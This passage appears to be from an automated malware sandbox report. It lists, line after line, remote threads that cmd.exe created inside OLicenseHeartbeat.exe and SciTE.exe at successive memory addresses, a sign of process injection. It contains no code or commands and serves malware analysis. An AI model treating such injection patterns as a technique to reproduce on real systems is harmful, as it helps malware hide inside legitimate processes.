            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5840000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5880000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 58C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5900000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5940000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5980000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 59C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5C70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6030000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6070000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6130000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6170000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6230000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6270000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6330000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6370000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6430000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6470000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6530000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6570000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6630000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6660000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 67E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6820000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6860000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6920000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6960000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7060000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7120000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7160000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7220000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7260000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7320000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7360000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7420000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7460000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7520000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7560000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7620000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7660000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7720000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7760000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7810000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7990000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 79C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7BC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7CC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 8020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 1F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 7F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2490000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 24D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2510000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2550000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2630000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2670000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2730000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2770000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2830000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2870000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2930000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2970000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B70000Jump to behavior
